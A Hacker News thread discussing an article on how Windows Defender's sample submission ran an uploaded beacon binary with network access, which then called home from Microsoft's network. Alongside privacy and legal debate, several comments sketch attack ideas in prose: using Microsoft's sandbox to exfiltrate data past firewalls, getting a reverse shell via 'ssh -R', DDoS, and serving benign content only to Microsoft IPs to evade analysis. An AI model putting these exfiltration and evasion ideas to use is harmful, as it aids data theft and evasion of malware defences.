Hacker News new | past | comments | ask | show | jobs | submit login
My application ran away and called home from Redmond (medium.com)
496 points by jviide 8 days ago | hide | past | web | favorite | 138 comments





I think the key quote here is

"This opens interesting data leak vector for attacker and also includes some privacy concerns. It is quite common that even in isolated environments, many of the Microsoft IP address ranges are whitelisted to make sure systems will stay up to date. This enables adversary to leak data via Microsoft services which is extremely juicy covert channel."

As a user, you can just disable automatic sample submission. In fact I'm pretty sure you can set it during installation, as I've never had to go through the settings to disable it, but it's still disabled on all my installations.

But the question is, from an adversary perspective, does your victim have it disabled?

Most likely they won't, so you can use Microsoft as a mule to exfiltrate data from otherwise firewalled victims.


> you can use Microsoft as a mule to exfiltrate data from otherwise firewalled victims

This is actually a smart idea. Make your spyware collect & encrypt data into a (new and unknown) binary and execute it, relying on the fact that Microsoft will exfiltrate it for you. When that binary itself is run (within MS' premises) it will then reach out to you with its embedded data.


And it all slips through the firewalls and whitelists because it looks just like official "Microsoft Telemetry" data. Wow.

Free data uploads. You could make unique binaries that when run start seeding a torrent. Maybe MS will put the kibosh on you uploading Seinfeld_S1_E1_obfuscated.exe to their cloud, but... how about a worm serving up its own updates through MS IPs?

Yet another reason I'm reluctant to upgrade to Windows 10. Too many buttons and toggles to turn off to arrive at a PC that functions the way I expect it to, and an update mechanism that's likely turning new ones on faster than I can spot them.

This is a Windows Defender thing, not a Windows 10 thing.

Windows Defender on Windows 7 also submits previously unobserved binaries to Microsoft for the same reason.

Go ahead, blame Win10, though. A non-zero number of people will take your comment to heart and believe that you knew what you were talking about with their entire soul, without seeing my comment.

I am so tired of seeing communal ignorance on this topic. People believe whatever bullshit they want, if it fits the narrative they are trying to sell.


You're splitting hairs on semantics. However you slice it, the software is present after a fresh OS installation, with a default setting that broadcasts my files to Microsoft.

Since you brought up Windows 7, I'll point out in those days Microsoft had the decency to inherit the setting from a choice made during OS installation (but even then you had to dig a little to discern the connection): https://i.imgur.com/SpqXmod.png. You further had to visit a SpyNet enrollment screen before it collected more "advanced" metadata like filenames, location, etc: https://i.imgur.com/z3qtuxp.png

On Windows 10, even if you turn off ALL three pages of privacy-hostile options during installation: https://i.imgur.com/RjXSM6S.png

...you still wind up with a Defender that broadcasts your files: https://i.imgur.com/1M7z3nH.png

Incidentally, the Privacy Policy links in that screenshot all just forward to the generic Microsoft one (https://privacy.microsoft.com/en-US/privacystatement), so who even knows what additional metadata each feature sucks up.

This is what I'm talking about when I complain about all the buttons and toggles to turn off just to get my OS to function the way I expect (in this case, stop indiscriminately bleeding my bits and bytes to the cloud).


They aren't indiscriminately doing anything. Only executables with hashes not previously seen are sent by default, and clearly you know how to turn that off.

They're legally bound by their privacy policy. They can't use info obtained by those executables to blackmail you or turn you in to authorities; they can only use that data to improve the anti-malware service they offer. And, as previously mentioned, you know how to turn it off.

The information about this isn't hidden. An operating system is complex, and thus operating system configuration is likely to be complex. Microsoft could have made things less difficult to find, you're right, and they are basing their defaults on the vast majority of people, like me, who are completely fine with doing what we can to improve their anti-malware service.

You're angry and that's fine.

Imagine the anger (and the fallout) if yet another malware worm used Windows to propagate across the world. People were absolutely LIVID last time, and there were lots of lawsuits against Microsoft for ILOVEYOU and Code Red and others of the era. The default settings you see today are a direct result of those events and other, smaller ones, like them.


>This is a Windows Defender thing, not a Windows 10 thing.

So Windows Defender isn't bundled as a part of Windows 10?


> So Windows Defender isn't bundled as a part of Windows 10?

It was also bundled as part of Windows 8.1, Windows 8, Windows 7, and Windows Vista on top of being available as a free download for Windows XP (and even 2000 during the beta phase).

The current form, after the Microsoft Security Essentials package was merged in, didn't come about until Windows 8 but Windows Defender as a product dates back to Microsoft's purchase of GIANT Software.

Either way you call it, XP or 8, saying Defender is a Windows 10 thing is like saying Firefox is an Ubuntu 19.04 thing. Sure, Ubuntu 19.04 does bundle Firefox, but so did many versions prior.

---

It's also worth noting that almost every antimalware product has an option to submit unknown binaries for analysis, and almost every one of those either enables it by default or very strongly suggests that you do so during setup to the point that I'd imagine most installations that aren't managed under corporate policy are submitting samples.


Sure. But Windows users often installed it on Windows 7. And on Windows XP, as I recall.

Also, other anti-malware apps typically upload novel binaries. And their test machines likely run them, with network access, for the same reasons that Microsoft does.

So this exfiltration channel may well have existed for decades. Whether it's been used or not is an open question, though.

Edit: style


I'm a Windows 10 user— I switched back after a decade of MacOS, and I've been really satisfied with it. It's a huge step forward from Windows 7/8.

Seems nuts that they'd just randomly run every binary that comes to them in a crash report.

I don't think that this is about crash reports.

Windows Defender, like many anti-malware apps, checks hashes of binaries. Anything that's new gets uploaded for testing.


Here's another thought. Could you use this to instead _attack_ someone from Microsoft's IP range?

Maybe not DDoS, but if the range is naively whitelisted, maybe something more precise due to the fact that the victim believes the environment to be isolated.


Hopefully MS block their sandboxes from contacting known ports, e.g. < 1024, so it would be difficult to attack common services, but who knows?

Based on the article it seems low ports work. Port 20 was posted by the beacon.

Also, in the image caption ...

> Because of Windows Defender automatic sample submission, Beacon binary was uploaded to Redmond and Beacon called Home from there.

... and below ...

> They run the executable in an environment where network connectivity is available.

Why would they do that? To see what happens?

And it's not just Microsoft. Many anti-malware apps (now, probably most) upload binaries. And I'm guessing that many run them. Maybe even with network access.

SensorFu might want to repeat this test using other anti-malware apps.


Consider: Malware that doesn't do anything suspicious unless it can first fetch a plausible benign file from what looks like a CDN. If the goal is to properly inspect the behaviour of potentially-malicious code, what it does after successfully fetching a set of ads is as, if not more important than what it does when the connection is blocked. Perhaps a multiplayer game with a backdoor triggered by the MotD service, through intentionally-vulnerable-to-buffer-overflows string processing code.

For bonus points, the C&C server realises the incoming IP has Microsoft's name attached, and only sends back the adverts. For anyone else, it sends a malicious image file as part of the drop, which exploits an intentional security vulnerability in the dropper...

That's actually disturbingly sneaky.


OK, that makes sense.

So how would one block this exploit? You can't test the malware properly without letting it reach its servers. So then you're also letting it upload its exfiltrated data. Which would likely be encrypted.


I think you'd more or less have to block *.microsoft.com at the gateway, then add explicit allows for WGA and Windows Update.

Or a group policy update to tell Defender not to upload stuff to MS.


Sorry. I meant how would Microsoft (and other anti-malware) firms block it. When they're testing binaries obtained from users' machines.

For users, sure, try to lock down Windows. Or (my preference) just don't use it. Or don't give it network access, if it contains any information that you care about.


> But the question is, from an adversary perspective, does your victim have it disabled?

Does it even matter? Extrapolating from that quote: a submitted sample could make abusive network requests against the victim (from MSFT's network, which is "trusted"), as well as network requests back to the attacker's server for control and/or data collection.


>As a user, you can just disable automatic sample submission.

I don't think disabling it really helps. It sounds like the goal is to prevent malware on your machine from ever leaking data on your machine to some external server. But even if you disable automatic sample submission, the malware on your machine could still submit a program on its own to Microsoft that leaks your data.


I think the key is that Windows 10 sends all new binaries to Microsoft by default. This is a total security and privacy (they're the same thing) nightmare.

From a copyright law perspective, this seems wild. Microsoft is downloading and running binaries from entities that may have never given Microsoft license to do so, including Microsoft's competitors. All based on a permission setting configured by an unrelated third party (the user).

> never given Microsoft license to do so

It's possible that they don't need it. There are fair use exemptions for reverse engineering and automated analysis. These may be the legal basis on which anti-malware research can be conducted.


Indeed, there have to be exceptions like this. Otherwise malware authors could sue AV companies for infringement, which don’t seem to fit the intention of IP law.

> Otherwise malware authors could sue AV companies for infringement, which don’t seem to fit the intention of IP law.

'You may sue the AV company for $1 million; users who suffered from your malware will civilly sue for $100 billion, and the government will charge you with crimes and put you away for a decade. Your move.'


A tangent:

There's this fascinating (to me, anyway) line between "viruses" (including worms, Trojans, and similar malware) that antivirus programs will tackle, and adware/spyware that they usually don't.

The difference between the two is whether it not there's a corporation publicly taking credit for the program and suing antivirus companies for defamation over calling it a "virus".

Adware/spyware is limited in distribution methods and payload types by the letter of the law, but otherwise the two classes are functionally identical.


i believe fair use only applies to software that you legally acquired.

if microsoft copies an application from my computer without asking, then it did not legally acquire it.

malware is a different case. malware entered my computer with the permission of the malware creator. i didn't steal it from them, but it came to me willingly. hence i am allowed to analyze it, and i am allowed to delegate that task to someone else.


Yes but who’s to say it came to your machine under such circumstances

Microsoft is the one that has to prove it has a valid license, not the other way around.

Let Microsoft deal with VirtualBox license claims from Oracle.

but until there is a court case with specific facts, that is very much a hope and a prayer by microsoft. it is, indeed, a risk they are taking.

Indeed the ENTIRE basis of the EULA is that the user copies the software by executing it, whereupon a copy exists both on-disk and in-memory. This is long settled jurisprudence. I’m sure that if Microsoft downloads and runs an AGPL-licensed work they expose themselves to pretty severe problems.

I'm pretty sure that for most home users who are also administrators of their computers, a setting pops up asking if you consent for telemetry to be collected.

I'm not sure if an appropriate warning or option is given for third-party users of a computer, or if it is required for administrators to warn third-party users as such.


> that may have never given Microsoft license to do so

I'm willing to bet it is in the license agreement for Windows and Windows Defender, so you have likely allowed Microsoft to do this


Just because I have a license to run a program does not mean I have a license to sub-license it to Microsoft.

There is also the issue that MS would have been given the copy by someone who did not have rights to distribute it, so the infringement is with the user.

You didn't explain what this has to do with copyright? CFAA[0] (or even [1]) seems like a better avenue to explore, but still likely a dead-end. Copyright seems like a misnomer.

[0] https://en.wikipedia.org/wiki/Computer_Fraud_and_Abuse_Act

[1] https://en.wikipedia.org/wiki/Economic_Espionage_Act_of_1996


Software is covered by copyright; if I write some program and compile it, and they copy it off my machine behind my back to run somewhere, it is copyright violation, is it not?

Copyright infringement. It is unlikely to apply. Particularly as the infringement has no "effect [...] upon the potential market for or value of the copyrighted work." Meaning Microsoft hasn't hurt anyone else's bottom line.

There's several fair usage arguments you can make. At least three strong arguments. But to be honest this would need to be tested in the courts one way or the other.

I don't really think copyright conceptually is a very fruitful argument here. CFAA is likely stronger.


> Meaning Microsoft hasn't hurt anyone else's bottom line.

How so? Microsoft spent money implementing this copying, so the copy is clearly of value to them. Why shouldn't they pay for it?


Fair. I wonder how a combo of CFAA, HIPAA and GDPR could fare here. I couldn't find whether Windows Defender automatically uploads all executables it sees, but apparently[0] non-executables deemed "suspicious" can be uploaded too.

--

[0] - https://www.reddit.com/r/Windows10/comments/8dmqdy/windows_d...


Worth noting Fair Use in Copyright is a USA thing.

In UK there have been some changes to Fair Dealing in the last couple of years that I'm not up to date on, but I don't know of anything that would make this allowed except having an explicit license from the copyright holder.


HIPAA would end up falling on your neck, not theirs. The users of windows are required to turn that setting off if you're in HIPAA land, among probably a hundred other things.

The License you agreed to by using Windows probably covers this explicitly, even if they didn't get covered under the explicit exception for reverse-engineering and automated analysis.

Even if I were to, hypothetically, cross-compile from Linux to Windows and deny my user the right to give away software written by me?

Pretty sure by you having this malware submission feature enabled you have given a limited license for them to execute the binary. You're barking up the wrong tree.

You (the user) may not have the right to grant such a license.

Assume for a second this is correct. What's to stop virus writers from embedding a ToS preventing Microsoft from running the code?

I'm not saying you're wrong, I'm saying it's really hard to work out how this is meant to work.


I don't think a virus is relevant here. I'm not a lawyer, but the idea of a "terms of service" for an unwanted and maliciously installed executable seems nonsensical. Virus authors can include whatever TOS they want, but the "user" hasn't agreed to the TOS practically by definition.

Unfortunately the law doesn’t view common sense answers like that as easily as you and I.

Good point. What about anti-virus or cloud-detonation services ? Sounds like there would be a similar type of challenges with those re licenses?

Perhaps. It seems that this option is enabled by default, though. I imagine something about this is buried in the pile of agreements you have to click through when installing Windows. What's the status of current legal understanding of the reality that EULAs are bullshit and nobody ever reads them? Maybe I could win something from Europe via GDPR complaint if I compiled an executable containing my PII only for it to be exfilled by Microsoft?

If this is Microsoft's idea of performing a security function, I have to assume that submitted executables are also going into a giant database/archive that can be turned over to the three-letter agencies with a single National Security Letter, complete with any secrets embedded therein.

Like Bo Burnham says, I guess I should lower my expectations a lot.


It's already happening.[0]

Marketplace Hansa was running Bitdefender, which pwned them to Europol.

> Europol has been supporting the investigation of criminal marketplaces on the Dark Web for a number of years. With the help of Bitdefender, an internet security company advising Europol's European Cybercrime Centre (EC3), Europol provided Dutch authorities with an investigation lead into Hansa in 2016. Subsequent enquiries located the Hansa market infrastructure in the Netherlands, with follow-up investigations by the Dutch police leading to the arrest of its two administrators in Germany and the seizure of servers in the Netherlands, Germany and Lithuania. Europol and partner agencies in those countries supported the Dutch National Police to take over the Hansa marketplace on 20 June 2017 under Dutch judicial authorisation, facilitating the covert monitoring of criminal activities on the platform until it was shut down today, 20 July 2017. In the past few weeks, the Dutch Police collected valuable information on high value targets and delivery addresses for a large number of orders. Some 10 000 foreign addresses of Hansa market buyers were passed on to Europol.

0) https://www.europol.europa.eu/newsroom/news/massive-blow-to-...


Haha, it's always great to see a Bo Burnham reference in the wild. He said that about love, though. Not... Microsoft.

That's frankly alarming. They should be doing nothing but static analysis on those binaries and if they must execute them, then certainly not giving them any network access. That's without even touching on any IP law concerns and how an end user can be unwillingly complicit in such things...

Malware will pull updates and commands from the internet, if they didn’t allow network access it would be near useless of a service. Attackers can make the binary pre-update look as innocent as they want.

I can understand why people are saying that network access is necessary for meaningful execution, given how much malware conditions on it. (For instance, WannaCry's kill switch.) But it's still hair-raising from a developer's standpoint since network actions you expected to control are now triggering unexpectedly. I can think of a few ways for that to get ugly.

In this case Beacon was sandboxed for security observation, but a build could easily be sandboxed for network-unsafe testing instead. Perhaps it's issuing malformed or high-volume requests to test internal functionality, safe in the knowledge that it's not actually connected to anything, and so it becomes a DoS attack when it's launched in the wild.

Or worse, maybe it's calling home to an endpoint that does something when it gets the call. It's not hard to imagine somebody putting together a binary with any required auth baked in on the logic "this only exists on my machine", and then suddenly getting it called from Redmond as well. Best practices ought to handle that alright, but it's still an awfully surprising thing to have happen to your test build.


Malware often checks to see if it has internet access and doesn't activate if it doesn't--to keep it from running in a test environment.

Cool, is kind of like STUN but for networks with almost no connectivity.

Create a binary that sends info when started, submit it and wait for it to send the info from Redmond to your server.

Too bad there is no return channel or you could make IP over windows update.


Can you return a bit by deciding whether the executable gets flagged as malicious in response to the network activity? Can you set up a timing difference to send more than one bit per executable?

Could you do ssh -R and get shell on the testing machine in Redmond? Could make a nice tunnel for getting US netflix.

I was thinking of doing some folding at home via this mechanism.

You could use it for crypto mining.

Assuming they only run it once, in one sandbox, that would probably not be particularly profitable.

Especially if there's a time limit on execution.

How many bitcoins can you mine in 30 seconds with a silly-low CPU cap?


How many bitcoins can you mine in 30 seconds with a silly-low CPU cap?

Somewhere in the region of $5e-9 worth of bitcoins.


Or launch ddos on a third party with a series of unique executables.

Advanced Threat Protection in Office 365 does this as well. It's a security feature that scans all linked files and attachments sent through Outlook.

A while back in my company we were deploying a client management tool (think TeamViewer but with more background management and software deployment capabilities). It needed to be very easy to install, so we just had a link to an EXE file that needed to be opened by our on-site IT departments. No extra steps were required.

Imagine our surprise when we suddenly saw machines popping up that were totally unfamiliar. These were machines connecting from a Microsoft IP, and all had random (but similarly formatted) usernames. They also provided random mouse inputs. We could even take control of these machines (!) but apparently they were short lived VMs that only existed for a few minutes before being recycled.

I contacted Microsoft support because at first we thought this may be a manual process (because of the mouse inputs and the user names), and we didn't want Microsoft employees seeing user data. Afterwards I also commented to the support person that someone may use these temporary machines as an attack vector (to use as an anonymous source, or in a DDoS attack), but the ticket was closed and if I recall correctly this was deemed "working as designed".


Anytime somebody here would like to claim that 'new' Microsoft is so much better and moral than 'old' one, I want to punch them in the face and start rant about Windows 10. Never met a single person, IT or not, who would not complain about it after moving from Windows 7.

Now I don't have to, I can just point to this thread and this comment.

This is pure arrogance - they know they have whole corporate world stuck with Office, even immediate move to Open source would take 20 years due to mostly Excel tight integration/expertise. We would all benefit from a good competition in this area...


One of the main reasons we don't want anything to do with most recent Microsoft software at my office is concern that unspecified data we're working with -- which might include information obtained under NDAs, clients' trade secrets, sometimes personal data, etc. -- might get sent up to the mothership when one of the telemetry systems phones home.

People look at me as if we're crazy for worrying about this possibility, even though Microsoft of 2019 is notoriously vague about how any of this works and we could be flagrantly violating multiple laws and contractual obligations if it happened.


This. If they were at least up-front and said what it collects, how, when, and how to turn it off (or better yet, followed privacy best practice and turned it into informed opt-in), I'd be more eager to upgrade.

With that said -- there's still room for due diligence. I've built systems which handle personal data, and we pretty much started with Debian minimal and worked from there. To make damn sure, we stuck them behind a whitelisted firewall. They had access only to things we allowed them to see, and only in the direction we allowed.


If it was just Microsoft... it also goes for Intel and Ryzen era AMD processors. Maybe IBM's new PowerPCs are safe ?

"Microsoft Windows 10 sends all new unique binaries for further analysis to Microsoft by default."

Even if you're developing? Even if you're developing proprietary applications not for public use?

All your code are belong to us.


I mean it's either send all or send none, there is not really an inbetween way to do this method.

> Microsoft Windows 10 sends all new unique binaries for further analysis to Microsoft by default.

Interestingly, Apple's now doing sort of the opposite of this. Instead of having the end-user's computer upload all executables to Apple for analysis, Apple requires the developer send them over and have them "notarized" before they run.


Reminds me of the story about the NSA contractor who had pirated Office on their laptop, and when Kaspersky AV predictably collected a sample of the virus-infected keygen to its servers, the US tried to spin it as "Russian data exfiltration".

My recollection was that he had samples of NSA malware on his computer, that Kaspersky detected this, and that shortly afterwards he was directly targeted by Russian state hackers.

It was not so much that Kaspersky was acting as malware, but that they were sending tips to the FSB.


Oh, yeah, I remember that one !

> Microsoft Windows 10 sends all new unique binaries for further analysis to Microsoft by default. They run the executable in an environment where network connectivity is available.

how did the author reach to this conclusion ? is it documented somewhere ?


He includes this screenshot[0], addressing the "send" part. The "run" part seems evident from the network traffic coming from MSFT.

[0] https://miro.medium.com/max/334/0*g_3L3SxR4IYoBAxD


>Microsoft Windows 10 sends all new unique binaries for further analysis to Microsoft by default.

Wait, what? Let's say you write code that you compile using MSVC or MinGW or whatever to an .exe file.

Surely there is no way this gets automatically sent to MS?


That is exactly what happens. And it happens with any new executable. I noticed it when i was trying out how well rust works on windows.

Seems bizarre. If I build 30 .NET binaries a day while building and testing a new feature, I guess all 30 get uploaded to MS and tested. And the same for all of the other developers doing the same sort of thing around the world. I wonder how often their test cluster goes down in flames while some C++ developer somewhere is trying to fix a memory access bug.

I couldn't even get Rust to install on Windows!

rustup is your friend. install that, and then rust with rustup.

Edit: forgot link: https://rustup.rs/


What did you run into? Did you file a bug? That’d be helpful! I use Rust on Windows every day, though that means I’m not often re-installing it...

Yes, you can test this yourself. Compile a 50MB binary and watch your bandwidth for a bit after attempting to run it.

I believe MacOS 10.15 also does this because there's a massive delay the first time I run a binary compiled with clang.


> They run the executable in an environment where network connectivity is available.

Why does MS run unknown executables? On the other hand, should be a nice DDoS provider for blackhats...


I'm sure Microsoft is keeping a very close eye on what they are actually doing. Run them in a virtual environment, see what they do to the environment and what internet communications they make. When it's done destroy the environment.

If it tried to do something like a DDoS it would be identified as doing so and marked as malware, end of test.


> I'm sure Microsoft is keeping a very close eye on what they are actually doing.

This seems like a questionable assumption. Microsoft is in the media for being "better" these days, but doing this at all seems like bad judgement. MSFT has lawyers to win a fair use case, I'll agree to that, but large corporations don't have a lot of incentive to minimize negative externalities, because of the lawyers and money for lawyers.


Oh c'mon. Microsoft takes security seriously and is genuinely trying to make sure Windows users aren't plagued with malware. And internally, Microsoft has a good track record of not having any data breeches.

Even with utter cynicism, "Microsoft hosts DOS attack on Apple" is such a disastrous headline that it's well worth avoiding, and that's before getting into any liability for botching something like this.

Perhaps it's not running the EXE but instead identifying URLs in the code, cURLing them to see what it gets, and doing so to verify what they get isn't malware?

The software in question (called Beacon) is designed to call home. The binary has built-in cryptographic keys and it sends traffic encrypted. The receiving end, called Home, receives these packets, decrypts it and verifies the sender and after that gives an alert.

The exe must have been running to be able to generate the proper encrypted payload and send it to right place. In this case ports 20 and 1025 over TCP.

Disclaimer: I am one of the people who wrote the software.


String obfuscation is trivial to do so I have a feeling they're actually running the binaries in order to do anything. Just a feeling, though- I don't think the author of the post stuck around long enough to see if the remote instance behaved as it should.

Maybe not DDoS - I doubt that MS allows that service to have that much throughput, but if you wanna try to get past someone's firewall rules, like the author points out - people may whitelist those particular IP's.

I was interested in this Beacon software, but then I found you had to contact them for pricing and I gave up on the idea.

Lesson: clear pricing keeps people like me in the game


I've found a lot more software startups and SaaS companies using this method lately.

When I actually am interested enough to talk to their salespeople (and they're straightforward enough with me) they've told me it helps them target whales more easily.

They can charge a lot more to a huge Enterprise and adjust lower for SMBs.


Of course the fun part of that is when the sales staff mistake a minnow for a whale.

Case in point, a large FTSE, NYSE, NASDAQ listed company with largely siloed internal departments, all with their own budgets. Your yearly budget might be $20,000 -- but they see the Inc. or Plc. with a turnover in the hundreds of millions and quote accordingly...

That situation makes for some fun sales calls.


I'm the same! I like to plan things, so if something doesn't allow me to fit it into my plan easily I will discard it as not an option.

Unknown costs, talking to other people, negotiating; these things produce trace amounts of anxiety. Anxiety I'd rather not deal with. A simple Pricing page solves this.

I'd rather spend an hour googling your competitors than contact someone for a quote.


If the price is not on the website, it is either:

(1) 'Enterprise' oriented software, in which case it is too expensive for you anyway (those long and personal sales trajectories, negotiations and commissions have to be recouped somehow)

(2) Not actually a product, but a Trojan horse to sell you lots of consulting and bespoke development services.


It would be a fun experiment to create a network probe executable that exfiltrates results back to you, and then push it to Microsoft in this way. I wonder how secure their test environment could be if it has Internet access...

I'd imagine the app is run in a DMZ and the internet FW blocks typical malware behavior once detected. After all the whole point of running it is to find if the executable is going to do these types of things so they'd be prepared.

> Microsoft Windows 10 sends all new unique binaries for further analysis to Microsoft by default.

That's not only a privacy concern; it's blatant copyright infringement.


I'm surprised the number of people on HN that assume Microsoft's security group involved in actively trying to find malware by running unknown programs has absolutely 0 precautions that one of the programs they run would be malicious.

Microsoft does not exactly have the best track record with this.

https://bugs.chromium.org/p/project-zero/issues/detail?id=12...


In what way is "had a RCE CVE" a track record that "Microsoft's security group involved in actively trying to find malware by running unknown programs has absolutely 0 precautions that one of the programs they run would be malicious."

I'm not talking about invulnerable software I'm talking about the comments assuming Microsoft doesn't expect __malware testing servers__ to run scanning or DDOS malware.


Depends on the definition of "malicious". Breaking hard drives and other hardware like in the good ol' days, or attacking other Microsoft servers? I agree, totally their problem. This is a proof of concept of phoning home though, possibly to exfiltrate data, via Microsoft servers and IP ranges!

It looks like you can manually upload submissions here:

https://www.microsoft.com/en-us/wdsi/filesubmission

This may be outdated, but you can also configure Defender to always prompt before sending:

https://docs.microsoft.com/en-us/windows/security/threat-pro...

It would be interesting to set it to always prompt and see what triggers it. There must be some level of fingerprinting done on the client (hash of the binary? network activity, etc.) that can be used to compare against known threats.


This shouldn't be hard to test.

Just create a native executable in your language of choice that connects to a hardcoded address of a server you have access to and try executing it on a windows machine with sample submission enabled.


Also seems like a viable vector to DOS something - if Microsoft runs this on some sort of cloud infra with a fat pipe

I think that's less likely, if MS gets a thousand identical copies of a binary, they probably aren't going to bother test-analyzing more than one. There also might be some rate-limiting on what they'll do from a particular machine.

So your attack might require first controlling a swam of Windows 10 machines, in which case you might as well do it directly :P


Who said anything about identical binaries? It's trivial to make two completely differently obfuscated binaries that do the same thing. If it were possible to determine behavior by static analysis, they wouldn't need to run it...

My first thought was this leading to DoS, even accidental ones.

If you're testing that your binary builds requests properly, maybe you've got it making them as fast as possible and you're running it without network permissions. Fine, until it suddenly runs with full network access and hammers whatever service you're pointing at.


Ok, so if I compile an executable that pops up a screen with a picture I drew + lots of personal and medical information about me, and phones me whenever it's executed, and then just leave it on my machine only for it to phone home from Redmond, can I sue them for copyright, GDPR, HIPAA violations and whatnot? How good is their "new unique binaries" detection? Could I do the same with just a bunch of files wrapped in a good ol' self-extracting archive?

Seriously, what in hell? Like always, blatant violations of users in the name of "security".


I'm not sure how you would invoke HIPAA with no medical professionals involved. It doesn't just magically apply because you wrote down your own medical information.

There seems to be a widespread misconception that any information covered by HIPAA is always covered, when the reality is that it's only protected health information by covered entities. There also seems to be a lot of confusion about what's a violation: as far as I know only covered entities can be liable, not people they wrongly pass information on to.

Now, if a covered medical software company accidentally let a build with accessible PHI go to Microsoft, I guess it's possible they could be HIPAA liable. But that's a pretty narrow case, and not one that's a threat to Microsoft.


> not one that's a threat to Microsoft

Until the medical software company sues Microsoft for damages to recoup the HIPAA fine. This is probably buried in some clickwrap contract though. (IANAL; not sure how enforceable such a contract would be)


You could replace HIPAA with GDPR again, since almost any medical information about an identifiable individual will constitute sensitive personal data that requires the stronger protections under that law.

Microsoft might claim it's a Legitimate Interest (recital 49 might be useful here, though I'm not sure it applies).

I suppose it could claim that, but I suspect it would be a tough sell with the regulators if Microsoft is uploading large amounts of data the user probably didn't even know about and some of that data turned out to include sensitive personal data.

Are many folks compiling sensitive personal data into binaries?

Presumably most people don't compile that sort of data into executables, but the situation seems to be unclear about whether other types of file might also be uploaded through similar mechanisms, and there also seems to be something going on involving MS executing the files and allowing remote connectivity, so the issue still seems relevant.

I'm not sure the GDPR protections are invoked by you giving them personal data they didn't ask for, but it'd be an interesting case! (Seems like anyone could screw a company by putting their name+address in the comment field of an anonymous survey, etc?)

If the data was uploaded deliberately through a system they operated, it is hard to see how they would be anything other than the data controller within the GDPR framework, unless maybe they actively tried to avoid collecting the personal data and it was supplied anyway. But it would be hard to argue that was the case if they were uploading data in ways the user of the computer in question probably wasn't even aware of.

(As an aside, if they are sweeping data on such a broad scale without being transparent about it and the only authorisation for doing so is buried deep in some legal document, it would be interesting to consider whether they were not only potentially in breach of GDPR but also various criminal computer misuse laws.)


I couldn't find any internet information on data not deliberately collected, so it's possible that nobody has figured out how GDPR applies (or I had the wrong search terms).

1. You can turn it off and on fresh install it even asks you for permission to upload unknown executables

2. In business/corporate environments especially, there are many options that should be group policied by a proper functioning IT team as one of their many tasks.


Too much FUD in this thread. Thanks for something level-headed.

Running unknown executables in a sandbox and watching what they do is pretty common in advanced malware prevention software, and I expect that there's something in the TOS for Defender that grants them the permission to do this.

It's not just executables. I once caught Microsoft Defender sending copies of sensitives files like places.sqlite out of my Firefox profile directory to Redmond. Needless to say, I disabled that feature permanently via local policy.

I'm amazed they run these with internet access. I understand though that without it a malicious program may not run the same.

It probably also allows them to do some spying on networks used by malware.


They probably limit the execution resources available or you would have yourself a free albeit unpredictable cloud execution platform for all your memory/CPU intensive processes.



Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact

Search: